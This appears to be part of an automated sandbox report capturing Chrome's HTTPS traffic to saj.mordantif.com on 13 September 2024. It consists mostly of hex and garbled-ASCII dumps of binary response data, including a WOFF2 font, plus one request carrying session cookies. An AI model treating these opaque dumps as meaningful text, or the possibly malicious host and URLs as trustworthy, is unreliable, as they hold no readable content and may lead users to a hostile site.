                                                        2024-09-13 13:07:07 UTC1369INData Raw: f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f 86
                                                        Data Ascii: l>.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78 af
                                                        Data Ascii: d3?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^x
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b 45
                                                        Data Ascii: 4uI^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|E
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2 d1
                                                        Data Ascii: kY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.l
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59 f2
                                                        Data Ascii: Y0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77 6f
                                                        Data Ascii: xC2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgwo
                                                        2024-09-13 13:07:07 UTC1369INData Raw: f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78 65
                                                        Data Ascii: 3,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'xe
                                                        2024-09-13 13:07:07 UTC1104INData Raw: 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4 f6
                                                        Data Ascii: +]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.549795172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1411OUTGET /cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:07 UTC651INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:07 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 93276
                                                        Connection: close
                                                        Content-Disposition: inline; filename="cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pja%2FHrsQmZ95dNJzCzGRJMag1bN0KhG%2BrSlv5cqqYMQegZKZgiJdBWkqfdNnxClgFYbp%2FyosBEaq3klowHJQ8hQ%2FMbXC%2BkPxus9SSAh7%2Fys%2B%2B9DX3%2F8K8P5YeOEbCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bc28bd57ced-EWR
                                                        2024-09-13 13:07:07 UTC718INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                        Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 5b f2 18 c0 c9 ed 95 03 8a 90 c3 88 31 3d 9b c5 f6 b9 49 10 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09
                                                        Data Ascii: [1=I4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_
                                                        2024-09-13 13:07:07 UTC1369INData Raw: dd 99 e6 a5 b3 17 a5 29 b5 d0 4c 00 33 40 09 60 f2 22 97 8e 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41
                                                        Data Ascii: )L3@`"c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 9d 64 4c 38 e4 12 5b ea 9f 6f 23 16 48 90 de 8b 35 34 35 e1 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d
                                                        Data Ascii: dL8[o#H545C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$M
                                                        2024-09-13 13:07:07 UTC1369INData Raw: d8 97 4e 77 b5 7a 46 0d 4f 75 67 aa 50 20 a3 13 2c 12 f3 54 e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3
                                                        Data Ascii: NwzFOugP ,T-nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc
                                                        2024-09-13 13:07:07 UTC1369INData Raw: eb bf 05 1c e9 f8 43 d9 ea af c6 23 62 41 f7 21 1d 7e 41 9f 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee
                                                        Data Ascii: C#bA!~A,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 51 d4 8c fe ba 0c 61 bf 8a 56 84 96 60 fd 57 1d d4 64 13 9a 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18
                                                        Data Ascii: QaV`Wd5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6a
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 2c d3 d8 3d d7 06 b0 97 d8 44 ab 65 07 b4 bb 45 c2 e3 55 62 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d
                                                        Data Ascii: ,=DeEUbiXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]
                                                        2024-09-13 13:07:07 UTC1369INData Raw: f9 9f e8 a2 9f d1 80 d3 10 00 43 fc 33 0d 97 86 cc aa 3c 41 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f
                                                        Data Ascii: C3<Aymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16
